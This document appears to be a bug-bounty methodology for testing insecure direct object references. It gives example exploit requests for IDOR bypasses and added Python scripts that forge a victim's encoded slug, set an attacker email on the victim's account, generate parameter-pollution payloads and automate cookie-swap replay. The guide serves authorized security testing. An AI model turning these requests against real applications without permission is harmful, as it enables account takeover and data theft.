Using organization emails, e.g. abc+1@wearehackerone.com, abc+2@wearehackerone.com etc., create multiple accounts on the web application
Note each account's identifiers (id, uuid etc.)
Use a container extension on Firefox, e.g. PwnFox, to keep the sessions apart
Sign in to both accounts using the containers to establish two separate sessions
While the proxy intercepts requests in the background, on one of the accounts (the victim account) CLICK & MODIFY EVERYTHING!!! Pay special attention to functionality that returns user information or modifies user data.
Questions to ask:
Is the request performing a READ (GET - info disclosure) action?
Is the request performing a WRITE (POST, PUT, DELETE - function call) action?
Questions to ask:
Is the request being made to an API endpoint?
Is the request being made to a specific file path?
Does the request contain Parameters in the URI?
Study HTTP requests to look for Direct Object References in URL parameters, POST data, APIs, cookies, headers, file paths, etc. (e.g. ?uid=1 or ?filename=file_1.pdf).
examples:
https://example.com/messages?user_id=1234
https://example.com/uploads?file=user1236-01.jpeg
https://example.com/group_files?group=group3
examples:
POST /delete_message
...
message_id=user1236-0111
POST /delete_group
...
group=group3
With respect to APIs, think about CRUD:
CREATE: POST
READ: GET
UPDATE: PUT
DELETE: DELETE
Where is the authorization token? URL, headers, cookies, POST data etc.
Questions to ask:
Where is the token?
Is it in the URL, a header, a cookie, the POST data etc.?
Is the token in plaintext?
Is the token predictable?
Is the token encoded?
Is the token hashed?
Does the token use custom hashing?
Comparing the auth token of user A and user B, do you see a pattern?
Step 3.1 IDOR Protection Bypass Encoding and Hashing
Step 3.1.2 Encoded Authorization Tokens Bypass
Step 3.1.4 Hashed Authorization Tokens Bypass
Step 3.16 Hidden Parameters/APIs
Step 3.18 Use (Hidden) Response Parameters
Step 3.17 JS Framework Used? Hidden Functions JS function calls
GF idor
Waybackurls
Email & SMS
Next Request
Sometimes you might come across a simple ?id=1 or filename=file_1.pdf; in other instances the identifier may be encoded or hashed, or an authorization token may be used that is encoded or hashed.
Sometimes there may be a value in the request that is used to determine the authorization.
In the following scenario the slug parameter (base64 encoded) is used for authorization: the "slug" value dXNlcjE1 is the base64 encoding of the string "user15", i.e. the user ID reflected in the request URL.
Additionally, the response displays an extra potential (hidden) parameter, Email.
So, in this case, add the "Email" parameter to the request, replace the ID in the URL with the victim's user ID (18) and send the victim's encoded "slug" value (base64 of "user18", i.e. dXNlcjE4).
Original HTTP Request 1:
PUT /api/users/15 HTTP/1.1
Host: target.com
…
{
"name":"Test User",
"image":"IMG URL",
"slug":"dXNlcjE1"
}
Original HTTP Response 1:
HTTP/1.1 200 OK
Set-Cookie: session=xxxxxxxx; Secure; HttpOnly;
...
{
"userid":"15",
"name":"Test User",
"Email":"test@example.com",
"Role": "User",
...
}
Notice the Email parameter in the response body.
Exploit Request 2 (changed request: notice the changed API endpoint, slug and Email):
PUT /api/users/18 HTTP/1.1
Host: target.com
…
{
"name":"Test",
"image":"IMG URL",
"Email":"attackercontrolledaddress@example.com",
"slug":"dXNlcjE4"
}
Exploit HTTP Response 2:
HTTP/1.1 200 OK
Set-Cookie: session=xxxxxxxx; Secure; HttpOnly;
...
{
"userid":"18",
"name":"Test User",
"Email":"attackercontrolledaddress@example.com",
"Role": "User"
}
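As an added example (not code from the original page), here is the token triage the "where is the token / is it encoded / do you see a pattern" questions ask for, applied to the two slug values of this example: it classifies a token as plaintext, hex of a common hash length or base64 of readable text, compares user A's and user B's decoded values for a shared prefix plus a counter, and derives the victim's slug and the exploit body from that pattern instead of typing them by hand. Only the two slugs dXNlcjE1 and dXNlcjE4 come from the page; the account names, the hash-length table and the other token shapes are assumptions.

```python
import base64
import binascii
import json
import re

# Constructed sample values: the slug each of our two test accounts received.
# Only the two slug strings come from the page; everything else is assumed.
SLUGS = {"userA": "dXNlcjE1", "userB": "dXNlcjE4"}

# Hex digests of these lengths are the usual suspects for a "hashed" identifier.
HASH_LENGTHS = {32: "possible MD5", 40: "possible SHA-1", 64: "possible SHA-256"}


def decode_base64(token):
    """Return the decoded text if token is base64 of printable ASCII, else None."""
    padded = token + "=" * (-len(token) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None
    if raw and all(32 <= b < 127 for b in raw):
        return raw.decode("ascii")
    return None


def classify(token):
    """Answer the plaintext / encoded / hashed questions for one token value."""
    findings = []
    if token.isdigit():
        findings.append("plaintext numeric id")
    if re.fullmatch(r"[0-9a-fA-F]+", token) and len(token) in HASH_LENGTHS:
        findings.append(HASH_LENGTHS[len(token)])
    decoded = decode_base64(token)
    if decoded is not None:
        findings.append("base64 of %r" % decoded)
    return findings or ["unrecognised (custom encoding or opaque random value?)"]


def compare(token_a, token_b):
    """Compare user A's and user B's tokens: same prefix plus a number means they are forgeable."""
    a, b = decode_base64(token_a), decode_base64(token_b)
    if a is None or b is None:
        return None
    ma, mb = re.fullmatch(r"(.*?)(\d+)", a), re.fullmatch(r"(.*?)(\d+)", b)
    if not (ma and mb and ma.group(1) == mb.group(1)):
        return None
    return {"prefix": ma.group(1), "a": int(ma.group(2)), "b": int(mb.group(2))}


def forge_slug(prefix, victim_id):
    """Encode the victim's identifier exactly the way the application encoded ours."""
    return base64.b64encode(f"{prefix}{victim_id}".encode()).decode()


def build_exploit(victim_id, attacker_email):
    """Path and JSON body for the exploit request, derived from the observed pattern."""
    pattern = compare(SLUGS["userA"], SLUGS["userB"])
    if pattern is None:
        raise ValueError("slugs do not follow a prefix+number pattern; try the other bypasses")
    body = {
        "name": "Test",
        "image": "IMG URL",
        "Email": attacker_email,  # hidden parameter seen only in the response
        "slug": forge_slug(pattern["prefix"], victim_id),
    }
    return "/api/users/%d" % victim_id, json.dumps(body)


if __name__ == "__main__":
    for name, slug in SLUGS.items():
        print(name, slug, classify(slug))
    print(compare(SLUGS["userA"], SLUGS["userB"]))
    print(build_exploit(18, "attackercontrolledaddress@example.com"))
```

Run it with two tokens captured from your own accounts; when compare() returns a prefix and two numbers, the identifier is predictable and forge_slug() produces any other user's value.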
Sometimes you might not get the response you're looking for after having attempted an IDOR. In such a case try HTTP verb tampering: resend the same request with a different method (e.g. GET instead of POST, or PUT/PATCH/DELETE instead of GET), since access controls are often applied per method.
Many times, web apps use cookies to determine authorisation to access objects.
E.g.
GET /api_v1/messages
Host: example.com
Cookie: phpsessid=SESSION_ID
Since cookies of other users are not trivial to obtain, you can try to blindly append user ID parameters/file paths etc. to the request.
E.g.
GET /api_v1/messages?uid=ANOTHER_USERS_ID
Host: example.com
Cookie: phpsessid=SESSION_ID
Sometimes applications are developed with alternative ways to retrieve resources using object IDs.
Note: the parameter uid should be tested with different parameter names, e.g. id=, user_id=, message_id= etc. It's worth studying other, similar requests in the web app to discover which parameter names are more likely to work.
E.g. if the following type of request doesn't work:
GET /get_receipt?receipt_id=2989
append the appropriate extension:
GET /get_receipt?receipt_id=2989.json
GET /get_receipt?receipt_id=2989.xml
etc.
Example:
GET /api/v1/users/profile/victim_id HTTP/1.1
Host: example.com
...
Change to:
GET /api/v1/users/profile/my_id/../victim_id HTTP/1.1
Host: example.com
...
Example:
GET /api/users/111 HTTP/1.1
Host: example.com
Try the Following:
GET /api/users/* HTTP/1.1
GET /api/users/% HTTP/1.1
GET /api/users/_ HTTP/1.1
GET /api/users/. HTTP/1.1
Example
GET /admin/profile HTTP/1.1
Host: example.com
...
Change to:
GET /ADMIN/profile HTTP/1.1
Host: example.com
...
Some HTTP requests may contain an identifier in multiple places in the URL or body of the request. If this is the case, attempt to change the ID in all places and in all variations to determine whether the web application handles access controls differently for each.
Execute every possible combination of the request by removing and changing the ID parameters (headers, data etc.)
Using parameter pollution, pass two UserId parameters: one containing the victim's UserId and the other your own account's UserId.
api.example.com/profile?UserId=123
change to:
api.example.com/profile?UserId=456&UserId=123
or try:
api.example.com/profile?UserId=123&UserId=456
See additional parameter pollution techniques here: Reset Token via Email Parameter Pollution
Example:
POST /api/get_profile HTTP/1.1
Host: example.com
...
{"user_id":"hacker_id","user_id":"victim_id"}
Combine techniques from Verb Tampering and Parameter Pollution
Example
POST /api/get_profile HTTP/1.1
Host: example.com
...
{"user_id":111}
Change to:
POST /api/get_profile HTTP/1.1
Host: example.com
...
{"id":[111]}
POST /api/get_profile HTTP/1.1
Host: example.com
...
{"user_id":111}
Change to:
POST /api/get_profile HTTP/1.1
Host: example.com
...
{"user_id":{"user_id":111}}
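The pollution and wrapping variants above, and the query-string variants of the parameter pollution section, as an added example that is not code from the original page: a generator for the duplicate-parameter payloads and a constructed target in which the authorization layer reads the first value of UserId / user_id while the data layer keeps the last. The target, the attacker and victim IDs and the "first vs last" behaviour are assumptions chosen to show why the order of the two parameters matters; the array and nested-object variants are generated as well but do not get past this particular target.

```python
import json
import re
from urllib.parse import parse_qs, parse_qsl, urlencode

# Constructed scenario: the session belongs to attacker 456, the victim is 123.
SESSION_USER = "456"
VICTIM = "123"

# --- constructed vulnerable target: two layers that disagree on which value counts ---

def query_authz(query):
    """Authorization layer: parse_qs keeps every value, but the check only looks at the first."""
    ids = parse_qs(query).get("UserId", [])
    return bool(ids) and ids[0] == SESSION_USER


def query_handler(query):
    """Data layer: dict(parse_qsl(...)) silently keeps the LAST duplicate."""
    return {"profile_of": dict(parse_qsl(query))["UserId"]}


def query_server(query):
    return (200, query_handler(query)) if query_authz(query) else (403, None)


def json_authz(raw_body):
    """Authorization layer working on the raw body (WAF-style regex): first key wins."""
    m = re.search(r'"user_id"\s*:\s*"([^"]*)"', raw_body)
    return m is not None and m.group(1) == SESSION_USER


def json_handler(raw_body):
    """Data layer: json.loads keeps the LAST duplicate key."""
    return {"profile_of": json.loads(raw_body)["user_id"]}


def json_server(raw_body):
    return (200, json_handler(raw_body)) if json_authz(raw_body) else (403, None)


# --- mutation generators for the variants the page lists ---

def query_variants(param, mine, victim):
    return {
        "victim only": urlencode([(param, victim)]),
        "mine then victim": urlencode([(param, mine), (param, victim)]),
        "victim then mine": urlencode([(param, victim), (param, mine)]),
    }


def json_variants(param, mine, victim):
    """Duplicate keys are written by hand because json.dumps cannot emit them."""
    return {
        "victim only": json.dumps({param: victim}),
        "mine then victim": '{"%s":"%s","%s":"%s"}' % (param, mine, param, victim),
        "victim then mine": '{"%s":"%s","%s":"%s"}' % (param, victim, param, mine),
        "wrapped in array": json.dumps({param: [victim]}),
        "nested object": json.dumps({param: {param: victim}}),
    }


def find_bypasses(server, variants, victim):
    """Return the variant names that come back 200 with the victim's object."""
    hits = []
    for name, payload in variants.items():
        status, body = server(payload)
        if status == 200 and body["profile_of"] == victim:
            hits.append(name)
    return hits


if __name__ == "__main__":
    print("query:", find_bypasses(query_server, query_variants("UserId", SESSION_USER, VICTIM), VICTIM))
    print("json: ", find_bypasses(json_server, json_variants("user_id", SESSION_USER, VICTIM), VICTIM))
```

Against a real target the two server functions become HTTP requests; the generators stay as they are, and a 200 carrying the victim's data for any variant is the finding.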
Content-Type
Example:
GET /api/v1/users/1 HTTP/1.1
Host: example.com
Content-type: application/xml
Change to:
GET /api/v1/users/2 HTTP/1.1
Host: example.com
Content-type: application/json
Example
POST /v2/GetData HTTP/1.1
Host: example.com
...
id=123
Change to:
POST /v1/GetData HTTP/1.1
Host: example.com
...
id=123
Note: You may also be able to identify unused (hidden) parameters or APIs in the front-end code in the form of JavaScript AJAX calls.
If that is the case, you may be able to craft requests using the hidden parameters to trigger a different response.
A note on testing: download the JS files and search them for endpoints and parameter names.
Some web applications developed in JavaScript frameworks may insecurely place the function calls for every role on the front-end and only select the appropriate ones based on the user's role.
Pointer: if you look into the front-end JavaScript code you may be able to identify AJAX calls to endpoints/APIs that contain direct object references.
Example of a basic AJAX function call in JS (jQuery):
function changeUserPassword() {
    $.ajax({
        url: "change_password.php",
        type: "post",
        dataType: "json",
        // uid and is_admin come from client-side state, so both are direct object
        // references the server must re-check against the session, not trust
        data: {uid: user.uid, password: user.password, is_admin: is_admin},
        success: function(result) {
            //
        }
    });
}
Think about scenarios where you can chain bypass techniques
Verb Tampering (GET to POST) -> Post-data Parameter Pollution
Content-type changing -> Wrap ID with Array
Outdated API Version -> Parameter Pollution
Outdated API Version -> Wildcard
Change Value
Note:
If a simple cookie swap doesn't work, inspect the request further and methodically test each applicable bypass technique (Step 3 IDOR Protection Bypass Techniques)
Note:
If you only have a single account, then apply the single account scenario methods
Based on steps 2 and 3, use all other applicable bypass techniques
Change Value
IDOR Bypasses
If you make a purchase from a website, or sign up to a service, they may send a link by email or SMS on which you can view order details, download an invoice etc. Such links carry an object identifier too, so test them the same way.
Cookies may sometimes be used in a web application to determine the logged-in session's level of authorization (sometimes on specific objects).
Note: This may fall under a weak session issue, but it can be used in conjunction with IDOR to READ or UPDATE objects.
Identify the type of cookie that is used
Narrow down the value that is used for authorization by filtering out unnecessary cookies
Is the token a JWT? https://jwt.io/
Is the cookie value in plaintext?
Is the cookie value encoded or a hashed value?
You can use the gf idor option on a list of URLs that have been collected to quickly search for URLs with potential IDORs,
e.g.
cat subdomains.txt | waybackurls | sort -u | tee -a waybackdata | gf idor | tee -a idorurls.txt
You can use Autorize to replay every proxied request with a second session's cookies, and PwnFox to colour-code the requests coming from each container.
Using containers (PwnFox or others), log into 2 separate account sessions (User A and User B)
In Autorize go to Configuration > Interception Filters, select "Scope items only: (Content is not required)" and click Add filter (be sure to have a scope set in Target > Scope)
Copy User B's cookie header into the configuration inside the Autorize tab. As of this writing, this should be under a "save headers" button
Autorize is off to start; turn it on
Effectively, you're testing to see if you can perform any functions on User A's account with User B's cookies
Use applicable bypass techniques
On the request, remove the user's cookie to see if the response still successfully references the object
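The cookie-swap test this setup automates, as an added example that is not code from the page or from Autorize: a constructed toy application (with the blindly honoured ?uid= parameter from the cookie section earlier) and a replay routine that re-sends a victim-session request with the attacker's cookie and with no cookie at all, comparing each response to the original. The session cookie values, user names and routes are assumptions; against a real target, toy_app would be replaced by an HTTP call carrying the same headers.

```python
# Constructed toy application standing in for the target (not from the page):
# the session cookie identifies the user, and /api_v1/messages honours ?uid= blindly.
SESSIONS = {"SESSION_A": "userA", "SESSION_B": "userB"}
MESSAGES = {"userA": ["hello from A"], "userB": ["hello from B"]}


def parse_query(query):
    return dict(p.split("=", 1) for p in query.split("&") if "=" in p)


def toy_app(path, headers):
    """Return (status, body) for a GET; swap in a real HTTP call for a live target."""
    cookie = headers.get("Cookie", "")
    user = SESSIONS.get(cookie.replace("phpsessid=", "", 1))
    if user is None:
        return 401, {"error": "no session"}
    route, _, query = path.partition("?")
    if route == "/api_v1/messages":
        # The IDOR: uid is taken from the query and never compared with the session user.
        uid = parse_query(query).get("uid", user)
        return 200, {"messages": MESSAGES.get(uid, [])}
    if route == "/api_v1/me":
        return 200, {"user": user}  # scoped to the session: no IDOR here
    return 404, {"error": "not found"}


def replay_with(cookie, path, app=toy_app):
    """Send the same request with a chosen session cookie (None = no cookie header)."""
    headers = {"Cookie": "phpsessid=" + cookie} if cookie else {}
    return app(path, headers)


def verdict(original, replayed):
    """Per-request decision: an identical response means the access control was bypassed."""
    if replayed == original:
        return "bypassed"
    if replayed[0] == original[0]:
        return "same status, different body: check manually"
    return "enforced"


def autorize_check(path, victim_cookie, attacker_cookie, app=toy_app):
    """Replay a victim-session request with the attacker's cookie and with no cookie."""
    original = replay_with(victim_cookie, path, app)
    return {
        "attacker cookie": verdict(original, replay_with(attacker_cookie, path, app)),
        "no cookie": verdict(original, replay_with(None, path, app)),
    }


def run_scope(paths, victim_cookie, attacker_cookie, app=toy_app):
    """Run the check over every in-scope request captured while clicking through User A's account."""
    return {p: autorize_check(p, victim_cookie, attacker_cookie, app) for p in paths}


if __name__ == "__main__":
    scope = ["/api_v1/messages", "/api_v1/messages?uid=userA", "/api_v1/me"]
    for path, result in run_scope(scope, "SESSION_A", "SESSION_B").items():
        print(path, result)
```

The plain /api_v1/messages request comes back "different body" for the attacker's cookie, which looks enforced; appending uid=userA turns it into a clean bypass, which is why the methodology says to append user ID parameters blindly rather than stopping at the first cookie swap.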